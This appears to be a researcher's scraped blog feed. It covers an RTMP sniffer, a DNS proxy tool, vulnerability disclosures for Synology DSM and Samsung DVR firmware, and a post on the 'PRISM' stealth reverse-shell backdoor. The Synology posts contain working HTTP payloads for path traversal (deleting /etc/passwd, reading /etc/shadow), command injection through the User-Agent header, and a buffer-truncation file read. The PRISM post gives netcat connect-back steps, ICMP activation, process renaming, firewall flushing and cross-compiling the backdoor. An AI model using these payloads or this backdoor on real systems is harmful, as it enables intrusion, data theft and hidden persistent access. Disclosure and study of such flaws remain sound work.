<h2 id="requirements">Requirements</h2>
<p><strong>rtmpSnoop</strong> works both on Windows and Unix.<br />
To run it you need only python (at least 2.7 version) and the scapy module.</p>
<p><strong>Linux Installation</strong></p>
<ul>
<li>
<p>Debian/Ubuntu:<br />
<code class="highlighter-rouge">apt-get install python-scapy</code></p>
</li>
<li>
<p>RedHat/Centos:<br />
<code class="highlighter-rouge">yum install scapy.noarch</code><br />
<code class="highlighter-rouge">yum install python-argparse.noarch</code></p>
</li>
</ul>
<p><strong>Mac Installation</strong></p>
<ul>
<li>Download pcapy from http://corelabs.coresecurity.com/</li>
<li>Download dnet from http://libdnet.sourceforge.net/</li>
</ul>
<p>Unzip and cd in to dnet file then</p>
<div class="highlighter-rouge"><pre class="highlight"><code> CFLAGS='-arch i386 -arch x86_64' ./configure --prefix=/usr
archargs='-arch i386 -arch x86_64' make
sudo make install
cd python
sudo python setup.py install
</code></pre>
</div>
<p><strong>Windows Installation</strong><br />
Follow this guide to install scapy module on windows:
http://www.secdev.org/projects/scapy/doc/installation.html#windows</p>
<h2 id="get-the-code">Get the code</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/rtmpSnoop.git
</code></pre>
</div>
<h2 id="usage">Usage</h2>
<p>The syntax is quite simple:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$python rtmpSnoop.py -h
usage: rtmpSnoop.py [-h] [-i DEVICE | -f PCAPFILE]
[--out-list | --out-m3u | --out-rtmpdump] [-p PORT]
[--one] [--quiet] [--debug]
rtmpSnoop lets you to grab the RTMP properties from live or dumped streams.
optional arguments:
-h, --help show this help message and exit
Input:
-i DEVICE Device to sniff on (Default: sniffs on all devices)
-f PCAPFILE PCAP file to read from
Output format:
--out-list Prints the RTMP data as list (Default)
--out-m3u Prints the RTMP data as m3u entry
--out-rtmpdump Prints the RTMP data in the rtmpdump format
Additional options:
-p PORT RTMP port (Default: sniffs on all ports)
--one Quit after the first stream found
--quiet Doesn't print anything except the RTMP output
--debug Enable DEBUG mode
</code></pre>
</div>
<h2 id="examples">Examples</h2>
<p>Sniffing on all interfaces, without filters:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>sudo python rtmpSnoop.py
</code></pre>
</div>
<p>Sniffing on eth0, and looking for RTMP streams on port 1935 only:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>sudo python rtmpSnoop.py -i eth0 -p 1935
</code></pre>
</div>
<p>Reading streams from PCAP file:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>python rtmpSnoop.py -f dump/tv.pcap
</code></pre>
</div>
<h2 id="output-formats">Output formats</h2>
<p>Default list:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>url: rtmp://192.168.1.1/live/channel?id=123
app: live
pageUrl: http://www.test.com/embedded/channel/1/500/380
swfUrl: http://www.test.eu/static/player.swf
tcUrl: rtmp://192.168.1.1/live
playPath: channel?id=123
flashVer: LNX 11,7,700,203
extra: S:OK
</code></pre>
</div>
<p>m3u entry:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#EXTINF:0,1, Stream
rtmp://192.168.1.1/live/channel?id=12345 app=live pageUrl=http://www.test.eu/embedded/channel/1/500/380
swfUrl=http://www.test.eu/static/player.swf tcUrl=rtmp://192.168.1.1/live playPath=channel?id=123 conn=S:OK live=1
</code></pre>
</div>
<p>rtmpdump syntax:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>rtmpdump -r 'rtmp://192.168.1.1/live/channel?id=12345' -a 'live' -t 'rtmp://192.168.1.1/live'
-y 'channel?id=12345' -W 'http://www.test.eu/scripts/player.swf' -p 'http://www.test.eu/embedded/channel/1/500/380'
-f 'LNX 11,7,700,203' -C S:OK --live -o stream.flv
</code></pre>
</div>
<h2 id="donations">Donations</h2>
<p>If you want to support this project, please consider donating:</p>
<ul>
<li>PayPal: andrea.fabrizi@gmail.com</li>
<li>BTC: 1JHCGAMpKqUwBjcT3Kno9Wd5z16K6WKPqG</li>
</ul>Andrea FabrizirtmpSnoop - The RTMP sniffer!
rtmpSnoop lets you to sniff RTMP streams from live TV, online channels and straming services and dump the RTMP properties in many formats.
You can analyse both live and dumped streams.
You can take a look at the GitHub project page
Features
Live sniffing from one ore more interfaces
Read dumped streams from PCAP files
Dump the RTMP properties in more formats (simple list, m3u entry or rtmpdump syntax)
Easy to use and cross platform!
Requirements
rtmpSnoop works both on Windows and Unix.
To run it you need only python (at least 2.7 version) and the scapy module.
Linux Installation
Debian/Ubuntu:
apt-get install python-scapy
RedHat/Centos:
yum install scapy.noarch
yum install python-argparse.noarch
Mac Installation
Download pcapy from http://corelabs.coresecurity.com/
Download dnet from http://libdnet.sourceforge.net/
Unzip and cd in to dnet file then
CFLAGS='-arch i386 -arch x86_64' ./configure --prefix=/usr
archargs='-arch i386 -arch x86_64' make
sudo make install
cd python
sudo python setup.py install
Windows Installation
Follow this guide to install scapy module on windows:
http://www.secdev.org/projects/scapy/doc/installation.html#windows
Get the code
git clone https://github.com/andreafabrizi/rtmpSnoop.git
Usage
The syntax is quite simple:
$python rtmpSnoop.py -h
usage: rtmpSnoop.py [-h] [-i DEVICE | -f PCAPFILE]
[--out-list | --out-m3u | --out-rtmpdump] [-p PORT]
[--one] [--quiet] [--debug]
rtmpSnoop lets you to grab the RTMP properties from live or dumped streams.
optional arguments:
-h, --help show this help message and exit
Input:
-i DEVICE Device to sniff on (Default: sniffs on all devices)
-f PCAPFILE PCAP file to read from
Output format:
--out-list Prints the RTMP data as list (Default)
--out-m3u Prints the RTMP data as m3u entry
--out-rtmpdump Prints the RTMP data in the rtmpdump format
Additional options:
-p PORT RTMP port (Default: sniffs on all ports)
--one Quit after the first stream found
--quiet Doesn't print anything except the RTMP output
--debug Enable DEBUG mode
Examples
Sniffing on all interfaces, without filters:
sudo python rtmpSnoop.py
Sniffing on eth0, and looking for RTMP streams on port 1935 only:
sudo python rtmpSnoop.py -i eth0 -p 1935
Reading streams from PCAP file:
python rtmpSnoop.py -f dump/tv.pcap
Output formats
Default list:
url: rtmp://192.168.1.1/live/channel?id=123
app: live
pageUrl: http://www.test.com/embedded/channel/1/500/380
swfUrl: http://www.test.eu/static/player.swf
tcUrl: rtmp://192.168.1.1/live
playPath: channel?id=123
flashVer: LNX 11,7,700,203
extra: S:OK
m3u entry:
#EXTINF:0,1, Stream
rtmp://192.168.1.1/live/channel?id=12345 app=live pageUrl=http://www.test.eu/embedded/channel/1/500/380
swfUrl=http://www.test.eu/static/player.swf tcUrl=rtmp://192.168.1.1/live playPath=channel?id=123 conn=S:OK live=1
rtmpdump syntax:
rtmpdump -r 'rtmp://192.168.1.1/live/channel?id=12345' -a 'live' -t 'rtmp://192.168.1.1/live'
-y 'channel?id=12345' -W 'http://www.test.eu/scripts/player.swf' -p 'http://www.test.eu/embedded/channel/1/500/380'
-f 'LNX 11,7,700,203' -C S:OK --live -o stream.flv
Donations
If you want to support this project, please consider donating:
PayPal: andrea.fabrizi@gmail.com
BTC: 1JHCGAMpKqUwBjcT3Kno9Wd5z16K6WKPqGSynology DSM vulnerability2013-12-20T13:00:00+01:002013-12-20T13:00:00+01:00https://www.andreafabrizi.it/2013/12/20/Synology DSM vulnerability<p>I’m again here with a Synology DSM vulnerability.</p>
<p>Synology DiskStation Manager (DSM) it’s a Linux based operating system, used for the DiskStation and RackStation products.</p>
<p>I found a lot of directory traversal in the FileBrowser components (DSM version <= 4.3-3810).
This kind of vulnerability allows any authenticated user, even if not administrative, to access, create, delete, modify system and configuration files.</p>
<p>The only countermeasure implemented against this vulnerability is to check that the path starts with a valid shared folder, so is enough to put the “../” straight after, to bypass the security check.</p>
<p>Vulnerables CGIs:</p>
<ul>
<li>/webapi/FileStation/html5_upload.cgi</li>
<li>/webapi/FileStation/file_delete.cgi</li>
<li>/webapi/FileStation/file_download.cgi</li>
<li>/webapi/FileStation/file_sharing.cgi</li>
<li>/webapi/FileStation/file_share.cgi</li>
<li>/webapi/FileStation/file_MVCP.cgi</li>
<li>/webapi/FileStation/file_rename.cgi</li>
</ul>
<p>Not tested all the CGI, but I guess that many others are vulnerable, so don’t take my list as comprehensive.</p>
<p>Following some examples (“test” is a valid folder name):</p>
<h3 id="delete-etcpasswd">Delete /etc/passwd</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
</code></pre>
</div>
<h3 id="arbitrary-file-download">Arbitrary file download</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
</code></pre>
</div>
<p>2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd</p>
<h3 id="remote-file-list">Remote file list</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
</code></pre>
</div>
<h2 id="timeline">Timeline</h2>
<ul>
<li>05/12/2013: First contact with the vendor</li>
<li>06/12/2013: Vulnerability details sent to the vendor</li>
<li>20/12/2013: Patch released by the vendor</li>
</ul>Andrea FabriziI’m again here with a Synology DSM vulnerability.Synology DSM multiple vulnerabilities2013-09-10T14:00:00+02:002013-09-10T14:00:00+02:00https://www.andreafabrizi.it/2013/09/10/Synology DSM multiple vulnerabilities<p>Synology DiskStation Manager (DSM) it’s a Linux based operating system, used for the DiskStation and RackStation products.</p>
<p>The version <= 4.3-3776 is affected by multiple vulnerabilities.</p>
<h2 id="remote-file-download">Remote file download</h2>
<p>Any authenticated user, even with the lowest privilege, can download any system file, included the <code class="highlighter-rouge">/etc/shadow</code>, samba password files and files owned by the other DSM users, without any restriction.</p>
<p>The vulnerability is located in <code class="highlighter-rouge">/webman/wallpaper.cgi</code>. The CGI takes as parameter the full path of the image to download, encoded in ASCII Hex format.
The problem is that any file type can be downloaded (not only images) and the path validation is very poor. In fact the CGI checks only if the path starts with an allowed directory (like /usr/syno/synoman/webman), and this kind of protection can be easily bypassed using the dot dot attack.</p>
<p>For example to access the <code class="highlighter-rouge">/etc/shadow</code> just encode the path as <code class="highlighter-rouge">2f7573722f73796e6f2f73796e6f6d616e2f7765626d616e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f736861646f77</code> (/usr/syno/synoman/webman/../../../../etc/shadow)</p>
<div class="highlighter-rouge"><pre class="highlight"><code>GET /webman/wallpaper.cgi?path=AABBCCDDEEFF11223344 HTTP/1.1
Host: 127.0.0.1:5000
Cookie: stay_login=0; id=XXXXXXXXXXX
</code></pre>
</div>
<h2 id="command-injection">Command injection</h2>
<p>A command injection vulnerability, on the <code class="highlighter-rouge">/webman/modules/ControlPanel/modules/externaldevices.cgi</code> CGI, allows any administrative user to execute arbitrary commands on the system, with root privileges.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>POST /webman/modules/ControlPanel/modules/externaldevices.cgi HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: ls
Cookie: stay_login=0; id=XXXXXXXXXXX
Content-Length: 128
action=apply&device_name=aa&printerid=1.1.1.1-aa';$HTTP_USER_AGENT>/tmp/output+%23&printer_mode=netPrinter&eject_netprinter=true
</code></pre>
</div>
<p>Putting the command to execute as the User Agent string, after the request the output will be ready into the <code class="highlighter-rouge">/tmp/output</code> file.</p>
<h2 id="partial-remote-content-download">Partial remote content download</h2>
<p>For the localization DSM uses some CGI, which takes the lang parameter (e.g. “enu” for english) and returns a Json object containing the localized strings in a dictionary format.</p>
<p>The strings are taken from a local file with the following path: <code class="highlighter-rouge">[current_dir]/texts/[lang_parameter_value]/strings</code></p>
<p>The <code class="highlighter-rouge">/strings</code> appended at the end of the path prevents a path injection, because any value injected using the “lang” parameter will be invalidated (in other words, it’s possible to read only files named <code class="highlighter-rouge">strings</code>). But, the interesting thing is that the full path of the strings files is built using a snprintf function like that:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>snprintf(&s, 0x80u, "texts/%s/strings", lang)
</code></pre>
</div>
<p>This means that putting a lang value big enough, it’s possible to overflow the 128 byte allowed by the snprintf and take out the <code class="highlighter-rouge">/strings</code> from the built path.</p>
<p>For example, the lang value <code class="highlighter-rouge">.///////////////////////////////////////////////////////////////////// ///////////////////../../../../../etc/synoinfo.conf</code> allow to get the <code class="highlighter-rouge">/etc/synoinfo.conf</code> file content.</p>
<p>The second problem is that the input file taken by the CGI must be formatted in a key/value way: <code class="highlighter-rouge">key1=string1</code></p>
<p>In other words, to get some content from a generic file it’s necessary that the file contains at least a “=” for each line (this is the reason why I called the vulnerability “Partial remote content download”).</p>
<p>At first glance it may seems very limiting, but, seen that it’s possible to read directly from the disk block device (e.g. /dev/vg1000/lv), the amount of data dumped is very huge. In my tests I was able to dump around the 25/30% of the drive (tested with mixed content, like documents, images, generic files). It’s possible to dump data from any drive connected. Interesting data can be also dumped from the /proc vfs.</p>
<p>This vulnerability impacts two different CGI and is exploitable without authentication by any remote user:</p>
<ul>
<li>/scripts/uistrings.cgi</li>
<li>/webfm/webUI/uistrings.cgi</li>
</ul>
<div class="highlighter-rouge"><pre class="highlight"><code>GET /scripts/uistrings.cgi?lang=XXXXXXXXX HTTP/1.1
Host: 127.0.0.1:5000
</code></pre>
</div>
<p>In the system there are two other uistrings.cgi, but are not affected.</p>
<h2 id="xss">XSS</h2>
<p>A classic Cross-site scripting affects the following CGI:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>/webman/info.cgi?host=XXXX&target=XXXX&add=XXXX
</code></pre>
</div>Andrea FabriziSynology DiskStation Manager (DSM) it’s a Linux based operating system, used for the DiskStation and RackStation products.Samsung DVR vulnerability2013-08-20T14:00:00+02:002013-08-20T14:00:00+02:00https://www.andreafabrizi.it/2013/08/20/Samsung DVR vulnerability<p>Samsung provides a wide range of DVR products, all working with nearly the same firmware. The vulnerabile firmware, version <= 1.10, it’s a Linux embedded system that expose a web interface through the lighttpd webserver and CGI pages.</p>
<p>The authenticated session is tracked using two cookies, called <code class="highlighter-rouge">DATA1</code> and <code class="highlighter-rouge">DATA2</code>, containing respectively the base64 encoded username and password. So, the first advise for the developers is to don’t put the user credentials into the cookies!</p>
<p>Anyway, the critical vulnerability is that in most of the CGI, the session check is made in a wrong way, which allows to access protected pages simply putting an arbitrary cookie into the HTTP request. Yes, that’s all.</p>
<p>This vulnerability allows remote unauthenticated users to:</p>
<ul>
<li>Get/set/delete username/password of local users (/cgi-bin/setup_user)</li>
<li>Get/set DVR/Camera general configuration</li>
<li>Get info about the device/storage</li>
<li>Get/set the NTP server</li>
<li>Get/set many other settings</li>
</ul>
<p>Vulnerables CGIs:</p>
<ul>
<li>/cgi-bin/camera_privacy_area</li>
<li>/cgi-bin/dev_camera</li>
<li>/cgi-bin/dev_devinfo</li>
<li>/cgi-bin/dev_devinfo2</li>
<li>/cgi-bin/dev_hddalarm</li>
<li>/cgi-bin/dev_modechange</li>
<li>/cgi-bin/dev_monitor</li>
<li>/cgi-bin/dev_pos</li>
<li>/cgi-bin/dev_ptz</li>
<li>/cgi-bin/dev_remote</li>
<li>/cgi-bin/dev_spotout</li>
<li>/cgi-bin/event_alarmsched</li>
<li>/cgi-bin/event_motion_area</li>
<li>/cgi-bin/event_motiondetect</li>
<li>/cgi-bin/event_sensordetect</li>
<li>/cgi-bin/event_tamper</li>
<li>/cgi-bin/event_vldetect</li>
<li>/cgi-bin/net_callback</li>
<li>/cgi-bin/net_connmode</li>
<li>/cgi-bin/net_ddns</li>
<li>/cgi-bin/net_event</li>
<li>/cgi-bin/net_group</li>
<li>/cgi-bin/net_imagetrans</li>
<li>/cgi-bin/net_recipient</li>
<li>/cgi-bin/net_server</li>
<li>/cgi-bin/net_snmp</li>
<li>/cgi-bin/net_transprotocol</li>
<li>/cgi-bin/net_user</li>
<li>/cgi-bin/rec_event</li>
<li>/cgi-bin/rec_eventrecduration</li>
<li>/cgi-bin/rec_normal</li>
<li>/cgi-bin/rec_recopt</li>
<li>/cgi-bin/rec_recsched</li>
<li>/cgi-bin/restart_page</li>
<li>/cgi-bin/setup_admin_setup</li>
<li>/cgi-bin/setup_datetimelang</li>
<li>/cgi-bin/setup_group</li>
<li>/cgi-bin/setup_holiday</li>
<li>/cgi-bin/setup_ntp</li>
<li>/cgi-bin/setup_systeminfo</li>
<li>/cgi-bin/setup_user</li>
<li>/cgi-bin/setup_userpwd</li>
<li>/cgi-bin/webviewer</li>
</ul>
<p>PoC exploit to list device users and password <a href="/files/samsung_dvr.py">here</a></p>Andrea FabriziSamsung provides a wide range of DVR products, all working with nearly the same firmware. The vulnerabile firmware, version <= 1.10, it’s a Linux embedded system that expose a web interface through the lighttpd webserver and CGI pages.DNS Proxy2013-05-17T14:00:00+02:002013-05-17T14:00:00+02:00https://www.andreafabrizi.it/2013/05/17/DNSProxy<h1 id="dns-proxy">DNS Proxy</h1>
<p>DNS proxy listens for incoming DNS requests on the local interface and
resolves remote hosts using an external PHP script, through http proxy requests.</p>
<p>If you can’t use VPN, UDP tunnels or other methods to resolve external names
in your LAN, DNS proxy is a good and simple solution.</p>
<p>The source code is hosted on <a href="https://github.com/andreafabrizi/DNSProxy/">GitHub</a></p>
<h2 id="get-the-code">Get the code</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/DNSProxy.git
</code></pre>
</div>
<h2 id="build">Build</h2>
<p>For debian/ubuntu users:<br />
<code class="highlighter-rouge">apt-get install libcurl4-openssl-dev</code></p>
<p>then</p>
<p><code class="highlighter-rouge">make</code></p>
<h2 id="usage">Usage</h2>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>dnsp -l 127.0.0.1 -h 10.0.0.2 -r 8080 -s http://www.andreafabrizi.it/nslookup.php
</code></pre>
</div>
<p>In this case, DNS proxy listens on port 53 (bind on 127.0.0.1) and sends the
requests to external script through the 10.0.0.2:8080 proxy.</p>
<p><strong>IMPORTANT:</strong> Please, don’t use the script hosted on my server, it’s only for testing purpose.
Instead host the nslookup.php script on your own server or use a free hosting services. Thanks!</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> dnsp 0.5
usage: dnsp -l <span class="o">[</span>local_host] -h <span class="o">[</span>proxy_host] -r <span class="o">[</span>proxy_port] -s <span class="o">[</span>lookup_script]
OPTIONS:
-v Enable DEBUG mode
-p Local port
-l Local host
-r Proxy port
-h Proxy host
-u Proxy username <span class="o">(</span>optional<span class="o">)</span>
-k Proxy password <span class="o">(</span>optional<span class="o">)</span>
-s Lookup script URL
</code></pre>
</div>
<h2 id="testing">Testing</h2>
<p>To test if DNS proxy is working correctly, first run the program as following (replace the placeholders with the correct proxy IP and port!):</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>dnsp -l 127.0.0.1 -h x.x.x.x -r nnnn -s http://www.andreafabrizi.it/nslookup.php
</code></pre>
</div>
<p>then, try to resolve an hostname using the <strong>dig</strong> command:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>dig www.google.com @127.0.0.1
</code></pre>
</div>
<p>The result must be something like this:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>; <<>> DiG 9.8.1-P1 <<>> www.google.com @127.0.0.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29155
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.google.com. IN A
;; ANSWER SECTION:
www.google.com. 3600 IN A 173.194.64.106
;; Query time: 325 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri May 17 11:52:08 2013
;; MSG SIZE rcvd: 48
</code></pre>
</div>
<h2 id="changelog">Changelog</h2>
<p>Version 0.5 - May 17 2013:</p>
<ul>
<li>Add proxy authentication support</li>
<li>port option is now optional (default is 53)</li>
<li>Fixed compilation error</li>
<li>Minor bug fixes</li>
</ul>
<p>Version 0.4 - November 16 2009:</p>
<ul>
<li>Now using libCurl for http requests</li>
<li>Implemented concurrent DNS server</li>
<li>Bug fixes</li>
<li>Code clean</li>
</ul>
<p>Version 0.1 - April 09 2009:</p>
<ul>
<li>Initial release</li>
</ul>Andrea FabriziDNS Proxy
DNS proxy listens for incoming DNS requests on the local interface and
resolves remote hosts using an external PHP script, through http proxy requests.
If you can’t use VPN, UDP tunnels or other methods to resolve external names
in your LAN, DNS proxy is a good and simple solution.
The source code is hosted on GitHub
Get the code
git clone https://github.com/andreafabrizi/DNSProxy.git
Build
For debian/ubuntu users:
apt-get install libcurl4-openssl-dev
then
make
Usage
dnsp -l 127.0.0.1 -h 10.0.0.2 -r 8080 -s http://www.andreafabrizi.it/nslookup.php
In this case, DNS proxy listens on port 53 (bind on 127.0.0.1) and sends the
requests to external script through the 10.0.0.2:8080 proxy.
IMPORTANT: Please, don’t use the script hosted on my server, it’s only for testing purpose.
Instead host the nslookup.php script on your own server or use a free hosting services. Thanks!
dnsp 0.5
usage: dnsp -l [local_host] -h [proxy_host] -r [proxy_port] -s [lookup_script]
OPTIONS:
-v Enable DEBUG mode
-p Local port
-l Local host
-r Proxy port
-h Proxy host
-u Proxy username (optional)
-k Proxy password (optional)
-s Lookup script URL
Testing
To test if DNS proxy is working correctly, first run the program as following (replace the placeholders with the correct proxy IP and port!):
dnsp -l 127.0.0.1 -h x.x.x.x -r nnnn -s http://www.andreafabrizi.it/nslookup.php
then, try to resolve an hostname using the dig command:
dig www.google.com @127.0.0.1
The result must be something like this:
; <<>> DiG 9.8.1-P1 <<>> www.google.com @127.0.0.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29155
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.google.com. IN A
;; ANSWER SECTION:
www.google.com. 3600 IN A 173.194.64.106
;; Query time: 325 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri May 17 11:52:08 2013
;; MSG SIZE rcvd: 48
Changelog
Version 0.5 - May 17 2013:
Add proxy authentication support
port option is now optional (default is 53)
Fixed compilation error
Minor bug fixes
Version 0.4 - November 16 2009:
Now using libCurl for http requests
Implemented concurrent DNS server
Bug fixes
Code clean
Version 0.1 - April 09 2009:
Initial releasePRISM backdoor2013-04-18T14:00:00+02:002013-04-18T14:00:00+02:00https://www.andreafabrizi.it/2013/04/18/Prism<h1 id="prism-backdoor">Prism backdoor</h1>
<p>PRISM is an user space stealth reverse shell backdoor. The code is available on <a href="https://github.com/andreafabrizi/prism">GitHub</a>.</p>
<p>It has been fully tested on:</p>
<ul>
<li><strong>Linux</strong></li>
<li><strong>Solaris</strong></li>
<li><strong>AIX</strong></li>
<li><strong>BSD/Mac</strong></li>
<li><strong>Android</strong></li>
</ul>
<p>PRISM can works in two different ways: <strong>ICMP</strong> and <strong>STATIC</strong> mode.</p>
<h2 id="icmp-mode">ICMP mode</h2>
<p>Using this operation mode the backdoor waits silently in background for a specific ICMP packet
containing the host/port to connect back and a private key to prevent third party access.</p>
<ul>
<li>First, run <strong>netcat</strong> on the attacker machine to wait for incoming connection from the backdoor:
<div class="language-bash highlighter-rouge"><pre class="highlight"><code><span class="gp">$ </span>nc -l -p 6666
</code></pre>
</div>
</li>
<li>Using the <strong>sendPacket.py</strong> script (or another packet builder) send the activation packet to the backdoor:
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666
</code></pre>
</div>
<p><strong>192.168.0.1</strong> is the victim machine running prism backdoor<br />
<strong>p4ssw0rd</strong> is the key<br />
<strong>192.168.0.10</strong> is the attacker machine address<br />
<strong>6666</strong> is the attacker machine port</p>
</li>
<li>The backdoor will connect back to netcat!</li>
</ul>
<h2 id="static-mode">STATIC mode</h2>
<p>Using this operation mode the backdoor try to connects to an hard-coded IP/PORT.<br />
In this case, just run netcat listening on the hard-coded machine/port:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> <span class="nv">$ </span>nc -l -p <span class="o">[</span>PORT]
</code></pre>
</div>
<h2 id="features">Features</h2>
<ul>
<li>Two operating modes (ICMP and STATIC)</li>
<li>Runtime process renaming</li>
<li>No listening ports</li>
<li>Automatic iptables rules flushing</li>
<li>Written in pure C</li>
<li>No library dependencies</li>
</ul>
<h2 id="get-the-code">Get the code</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/prism.git
</code></pre>
</div>
<h2 id="configuration">Configuration</h2>
<p>Before building, you have to configure the backdoor editing the source code.<br />
Following the configuration parameters description:</p>
<p><strong>STATIC mode:</strong><br />
<em>REVERSE_HOST</em>: Machine address to connect back<br />
<em>REVERSE_PORT</em>: Machine port to connect back<br />
<em>RESPAWN_DELAY</em>: Time, in seconds, between each connection</p>
<p><strong>ICMP mode:</strong><br />
<em>ICMP_KEY</em>: Key/Password to activate the backdoor</p>
<p><strong>Generic parameters:</strong><br />
<em>MOTD</em>: Message to be printed at the backdoor connection<br />
<em>SHELL</em>: Shell to execute<br />
<em>PROCESS_NAME</em>: Fake process name</p>
<h2 id="building">Building</h2>
<p><code class="highlighter-rouge">gcc <..OPTIONS..> -Wall -s -o prism prism.c</code></p>
<p>Available GCC options:<br />
<strong>-DDETACH</strong> #Run the process in background<br />
<strong>-DSTATIC</strong> #Enable STATIC mode (default is the ICMP mode)<br />
<strong>-DNORENAME</strong> #Doesn’t renames the process<br />
<strong>-DIPTABLES</strong> #Try to flush all iptables rules</p>
<p>Example:<br />
<code class="highlighter-rouge">gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c</code></p>
<h2 id="cross-compiling">Cross Compiling</h2>
<ul>
<li>
<p><strong>Android</strong><br />
Change the shell to <em>/system/bin/sh</em><br />
<code class="highlighter-rouge">apt-get install gcc-arm-linux-gnueabi</code><br />
<code class="highlighter-rouge">arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism</code></p>
</li>
<li>
<p><strong>Linux 64bit</strong> (using a 32bit host system) <br />
<code class="highlighter-rouge">apt-get install libc6-dev-amd64</code><br />
<code class="highlighter-rouge">gcc -DDETACH -m64 -Wall -s -o prism prism.c</code></p>
</li>
<li>
<p><strong>Linux 32bit</strong> (using a 64bit host system) <br />
<code class="highlighter-rouge">apt-get install libc6-dev-i386</code><br />
<code class="highlighter-rouge">gcc -DDETACH -m32 -Wall -s -o prism prism.c</code></p>
</li>
</ul>
<h2 id="backdoor-building-information">Backdoor building information</h2>
<p>The backdoor ignore any command line parameter, except the <strong>Inf0</strong> (the last char is a digit).<br />
This option allow you to see some information about the backdoor:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code><span class="gp">$ </span>./prism Inf0
Version: 0.5
Mode: icmp
Key: p455w0rD
Process name: <span class="o">[</span>udevd]
Shell: /bin/sh
Detach: Yes
Flush Iptables: No
</code></pre>
</div>Andrea FabriziPrism backdoor
PRISM is an user space stealth reverse shell backdoor. The code is available on GitHub.
It has been fully tested on:
Linux
Solaris
AIX
BSD/Mac
Android
PRISM can works in two different ways: ICMP and STATIC mode.
ICMP mode
Using this operation mode the backdoor waits silently in background for a specific ICMP packet
containing the host/port to connect back and a private key to prevent third party access.
First, run netcat on the attacker machine to wait for incoming connection from the backdoor:
$ nc -l -p 6666
Using the sendPacket.py script (or another packet builder) send the activation packet to the backdoor:
./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666
192.168.0.1 is the victim machine running prism backdoor
p4ssw0rd is the key
192.168.0.10 is the attacker machine address
6666 is the attacker machine port
The backdoor will connect back to netcat!
STATIC mode
Using this operation mode the backdoor try to connects to an hard-coded IP/PORT.
In this case, just run netcat listening on the hard-coded machine/port:
$ nc -l -p [PORT]
Features
Two operating modes (ICMP and STATIC)
Runtime process renaming
No listening ports
Automatic iptables rules flushing
Written in pure C
No library dependencies
Get the code
git clone https://github.com/andreafabrizi/prism.git
Configuration
Before building, you have to configure the backdoor editing the source code.
Following the configuration parameters description:
STATIC mode:
REVERSE_HOST: Machine address to connect back
REVERSE_PORT: Machine port to connect back
RESPAWN_DELAY: Time, in seconds, between each connection
ICMP mode:
ICMP_KEY: Key/Password to activate the backdoor
Generic parameters:
MOTD: Message to be printed at the backdoor connection
SHELL: Shell to execute
PROCESS_NAME: Fake process name
Building
gcc <..OPTIONS..> -Wall -s -o prism prism.c
Available GCC options:
-DDETACH #Run the process in background
-DSTATIC #Enable STATIC mode (default is the ICMP mode)
-DNORENAME #Doesn’t renames the process
-DIPTABLES #Try to flush all iptables rules
Example:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c
Cross Compiling
Android
Change the shell to /system/bin/sh
apt-get install gcc-arm-linux-gnueabi
arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism
Linux 64bit (using a 32bit host system)
apt-get install libc6-dev-amd64
gcc -DDETACH -m64 -Wall -s -o prism prism.c
Linux 32bit (using a 64bit host system)
apt-get install libc6-dev-i386
